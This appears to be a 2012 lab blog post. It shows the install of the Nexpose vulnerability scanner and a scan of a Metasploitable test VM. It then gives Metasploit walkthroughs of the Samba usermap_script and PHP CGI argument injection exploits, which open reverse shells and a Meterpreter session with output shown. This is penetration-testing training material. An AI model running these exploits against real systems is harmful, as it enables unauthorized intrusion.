information gathering – nexpose

Nexpose Community Edition is a free vulnerability scanner, a single-user version of the award-winning Rapid7 Nexpose Enterprise Solution

Installed for testing on Backtrack 5R3 – Note you may require different packages to install than me. During instal it told me what I required.
Just not down any it asks for and then apt-get install (package)

Also It will ask for 8GB of Ram (Insane request! I gave it 4GB and it works)

1. Install the package which are required to run NeXpose (You may require others it will tell you what you need as you install)
root@bt:~# apt-get install libstdc++5

2. Download Nexpose Community Edition from http://www.rapid7.com/vulnerability-scanner.jsp (32bit or 64bit linux version)

3. Make the .bin bootable.
root@bt:~# chmod +x NeXposeSetup-Linux32.bin

4. Boot
root@bt:~/NeXpose#./NeXposeSetup-Linux32.bin

5. Follow the instructions on the Screen too install Nexpose

6. Login https://localhost:3780/

Installs in directory /opt/rapid7/nexpose

Results

Tested against virtual machine (Virtualbox) metasploitable https://myexploit.wordpress.com/web-application-metasploitable/

Screenshot of the results – Filtered to show all metasploit exploits. (All but two proved to be false positives)

Results

 

 

 

 

 

 

 

Below clicking on Samba MS-RPC Shell link to see the exploit description you can then search for this in metasploit manually.

Results-2

 

 

 

Manual search demonstration and exploit.

msf > search Samba “username map script” Command Execution

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba “username map script” Command Execution

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set lhost 192.168.56.102

msf exploit(usermap_script) > set rhost 192.168.56.101

msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp

msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:60636) at 2012-12-10 12:19:50 +0000

ls -l
total 89
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Dec 10 06:25 dev
drwxr-xr-x 95 root root 4096 Dec 10 06:25 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx—— 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw——- 1 root root 14473 Dec 10 06:25 nohup.out

And the other working exploit

msf > search PHP CGI Argument Injection

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/php_cgi_arg_injection 2012-05-03 00:00:00 UTC excellent PHP CGI Argument Injection

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > set lhost 192.168.56.102

msf exploit(php_cgi_arg_injection) > set rhost 192.168.56.101

msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 192.168.56.102:4444
[*] Sending stage (39217 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:59982) at 2012-12-10 12:24:49 +0000

meterpreter > shell
Process 5183 created.
Channel 0 created.
ls -l
total 72
drwxrwxrwt 2 root root 4096 May 20 2012 dav
drwxr-xr-x 8 www-data www-data 4096 May 20 2012 dvwa
-rw-r–r– 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4096 May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4096 May 14 2012 phpMyAdmin
-rw-r–r– 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4096 May 14 2012 test
drwxrwxr-x 22 www-data www-data 20480 Apr 19 2010 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4096 Apr 16 2010 twiki

Advertisements

One thought on “information gathering – nexpose

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s